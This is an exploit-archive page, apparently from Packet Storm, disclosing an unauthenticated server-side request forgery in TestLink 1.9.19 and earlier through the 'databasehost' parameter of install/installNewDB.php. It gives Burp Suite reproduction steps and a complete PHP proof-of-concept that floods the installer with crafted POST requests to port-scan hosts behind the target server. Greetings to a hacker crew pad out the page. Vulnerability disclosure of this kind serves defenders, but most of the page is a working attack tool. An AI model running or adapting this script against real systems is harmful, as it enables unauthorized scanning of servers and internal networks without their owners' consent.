exploit the possibilities

TestLink 1.9.19 Server-Side Request Forgery

TestLink 1.9.19 Server-Side Request Forgery
Posted Jun 3, 2019
Authored by Manish Tanwar

TestLink versions 1.9.19 and below suffers from a server side request forgery vulnerability.

tags | exploit
MD5 | 671a64f681314d0d390da608a907ce79

TestLink 1.9.19 Server-Side Request Forgery

Change Mirror Download
##################################################################################################
#Exploit Title : TestLink (version <= 1.9.19) Server Side Request Forgery
#Author : Manish Kishan Tanwar AKA error1046
#Vendor Link : http://testlink.org
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################

/////////////////////////
//Vulnerability OverView
/////////////////////////

TestLink (version <= 1.9.19) is vulnerable to Un-Autheticated Server-Side Request Forgery (SSRF) which allow an attacker to perform Network device Port
scanning. Device may be the same which is hosting Testlink code or it may be connected to the same network.
This issue exists in script "install/installNewDB.php" and affected parameter is "databasehost".


Steps to Reproduce:
===================
1. Configure your web browser with any proxy software (i am using Burp Suite).
2. Access below mentioned URL in web browser and click "Continue" button:
http://localhost/testlink-1.9.19/install/installCheck.php?licenseOK=on
3. Turn on Burp Interception.
4. Now, in web browser, fill relevant information in input fields (Database admin login/Password etc) and click "Process TestLink Setup" button.
5. In Burp proxy, send the intercepted request to Burp Repeater tab by pressing "CTRL+R" key combination.
6. Switch to Burp Repeater tab and change the value of HTTP Post Parameter "databasehost" from "localhost" to "localhost:22" (if your machine is Linux and SSH running on it), click "Go" button in Burp Repeater.
7. Application response will appear in Burp repeater response tab, which will beshowing that "MySQL server has gone away".
8. Now, change the value of "databasehost" from "localhost:22" to "localhost:1337", click "Go" button in Burp Repeater.
9. Application will respond with HTTP response having SQL server error message "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond".

//////////////////////////
//Exploit code starts here
//////////////////////////

<?php
set_time_limit(0);
/*coded by Manish Kishan Tanwar @indishell lab (http://mannulinux.org) */

$head = '

<html>

<head>

<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>

</script>

<title>--==[[Indishell forever]]==--</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<STYLE>

body {
background: url("https://raw.githubusercontent.com/incredibleindishell/sqlite-lab/master/images/head.jpg");
background-size: 100% 700px;

font-family: Tahoma;

color: white;



}


input {

border : solid 2px ;

border-color : black;

BACKGROUND-COLOR: #444444;

font: 8pt Verdana;


color: white;

}


submit {

BORDER: buttonhighlight 2px outset;

BACKGROUND-COLOR: Black;

width: 30%;

color: #FFF;

}


#t input[type=\'submit\']{

COLOR: White;

border:none;

BACKGROUND-COLOR: black;

}


#t input[type=\'submit\']:hover {



BACKGROUND-COLOR: #ff9933;

color: black;



}

tr {

BORDER: dashed 1px #333;

color: #FFF;

}

td {

BORDER: dashed 0px ;

}

.table1 {

BORDER: 0px Black;

BACKGROUND-COLOR: Black;

color: #FFF;

}

.td1 {

BORDER: 0px;

BORDER-COLOR: #333333;

font: 7pt Verdana;

color: Green;

}

.tr1 {

BORDER: 0px;

BORDER-COLOR: #333333;

color: #FFF;

}

table {

BORDER: dashed 2px #333;

BORDER-COLOR: #333333;

BACKGROUND-COLOR: #191919;;

color: #FFF;

}

textarea {

border : dashed 2px #333;

BACKGROUND-COLOR: Black;

font: Fixedsys bold;

color: #999;

}

A:link {

border: 1px;

COLOR: red; TEXT-DECORATION: none

}

A:visited {

COLOR: red; TEXT-DECORATION: none

}

A:hover {

color: White; TEXT-DECORATION: none

}

A:active {

color: white; TEXT-DECORATION: none

}

</STYLE>

<script type="text/javascript">

<!--

function lhook(id) {

var e = document.getElementById(id);

if(e.style.display == \'block\')

e.style.display = \'none\';

else

e.style.display = \'block\';

}

//-->

</script>

';




echo $head ;

echo '


<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >





<td width="100%" align=center valign="top" rowspan="1">

<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ TestLink </font><font color=white size=5 face="comic sans ms"><b>SSRF </font><font color=green size=5 face="comic sans ms"><b> Exploit POC]]==--</font><br>
<font color=#ff9933 size=3 face="comic sans ms"><b>--==[[ With </font><font color=white size=3 face="comic sans ms"><b>Love From IndiShell</font><font color=green size=3 face="comic sans ms"><b> Crew]]==--</font>
<div class="hedr">


<td height="10" align="left" class="td1"></td></tr><tr><td

width="100%" align="center" valign="top" rowspan="1"><font

color="red" face="comic sans ms"size="1"><b>

<font color=#ff9933>

##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>

-==[[Greetz to]]==--</font><br> <font color=#ff9933>zero cool, code breaker ica, root_devil, google_warrior,INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, ethicalnoob Indishell, cyber warrior, Anurag, Hacker Fantastic and rest of TEAM INDISHELL<br>

<font color=white>--==[[Love to]]==--</font><br># My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Jagriti, Hardeep Singh, Ashu bhai ji, Rafay Baloch, Soldier Of God, Shafoon, Rehan Manzoor, almas malik, Bhuppi, Mohit, Ffe ^_^, Govind Singh, Shardhanand, Budhaoo, Don(Deepika kaushik) and D3 <br>



<b>

<font color=#ff9933>

##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>



</table>

</table> <br>


';

?>
<div align=center>
<table width="60%" cellspacing="0" cellpadding="0" class="tb1" style="border: 0px; background-color: transparent; ">
<tr><td width="80%" align=center style="padding: 10px; background-color: #191919; opacity: 0.6;">

<form method="POST" >
Target URL: <input style="width: 200px;" type=text name=url value="http://target/testlink_base_dir/">
<br><br>
Ports to be scan: <input type=text name=ports value="21,445,1433,3389">

&nbsp &nbsp
Host to be scan: <input type=text name=host value="Host or IP">

</td></tr><tr>
<td width="40%" align=center style="padding: 10px;">
<input type="submit" value="Billu, Spread the magic" name="own_it"/></form>
</td></tr></table>


<?php

function bas_jugad($lu,$host,$p0rt,$timeout)
{

$payload="isNew=1&databasetype=mysql&databasehost=$host:$p0rt&databasename=testlink3&tableprefix=box3&databaseloginname=indishell&databaseloginpassword=tost&tl_loginname=root&tl_loginpassword=";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "$payload");
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$result = curl_exec ($ch);
curl_close ($ch);


return $result;

}



if(isset($_POST['own_it']))
{
$url_auth=trim($_POST['url']).'/install/installNewDB.php';
$list=$_POST['ports'];
$h0st=trim($_POST['host']);

///////////////////////////////
///Check if host is up or not
///////////////////////////////
$test_port = '31337';
$t_out='100';


$check = bas_jugad($url_auth,$h0st,$test_port,$t_out);
//print_r(strstr($check,'php_network_getaddresses'));


if(!(strstr($check,'php_network_getaddresses'))=='')

{

echo "<script>alert('Target is unreachable, Get me something working :|');</script><br>";

die();
}

////////////////////////////
///Time to get back to work
///////////////////////////

else
{

echo "<script>alert('Target is reachable, I am rolling out =)) ');</script><br>";



if(!(strstr($list,","))=='')
{

$all_ports=array();
$ch = array();
$content = array();
$open = array();
$closed = array();

$all_ports=explode(',',$list);
$n_time='5';

$t1 = microtime(true);
$mh = curl_multi_init();

$i = 0;

foreach($all_ports as $port)

{

$payload="isNew=1&databasetype=mysql&databasehost=$h0st:$port&databasename=testlink3&tableprefix=box3&databaseloginname=indishell&databaseloginpassword=tost&tl_loginname=root&tl_loginpassword=";

$ch[$i] = curl_init();
curl_setopt($ch[$i], CURLOPT_URL, $url_auth);
curl_setopt($ch[$i], CURLOPT_HEADER, 0);
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 5);
curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch[$i], CURLOPT_POST, 1);
curl_setopt($ch[$i], CURLOPT_POSTFIELDS, $payload);

curl_multi_add_handle($mh, $ch[$i]);
$i ++;
}

$active = null;
do
{
$mrc = curl_multi_exec($mh, $active);
usleep(200000); // limit requests for a while
} while ($active);



$i = 0;
foreach ($ch AS $i => $c)
{
$content[$i] = curl_multi_getcontent($c);
curl_multi_remove_handle($mh, $c);
}

curl_multi_close($mh);

for($j=0;$j < count($content);$j++)
{

if(!(strstr($content[$j],'refused'))=='')
{
// echo "Port $all_ports[$j] is closed<br>";

}

else
{
//echo "port $all_ports[$j] is open 8-)<br>";
array_push($open,$all_ports[$j]);
}



}

echo '<table width="50%" cellspacing="0" cellpadding="0" class="tb1" >
<tr><td align=center style="padding: 10px; background-color: black; opacity: 0.9;"><font color=#ff9933>--==[[ Open Ports on Target server '.$h0st.' ]]==--</font></td></tr>';

foreach($open as $in_open)

{

echo '<tr><td align=center style="padding: 3px; background-color: black; opacity: 0.9;"><font color="white">Port '.$in_open.'</font></td></tr>';

}
echo '</table>';



}
else
{

}
}




}

echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">Developed By 1046 at <font color=#ff9933>IndiShell Lab</font>";

?>

/////////////////////
//Exploit code end
/////////////////////

--==[[ Greetz To ]]==--

Guru ji zero, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba,
Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad,
Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256
Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, Bikash Dash

--==[[Love to]]==--

My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP
Mohit, Ffe, Shardhanand, Budhaoo, Jagriti, Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    1 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close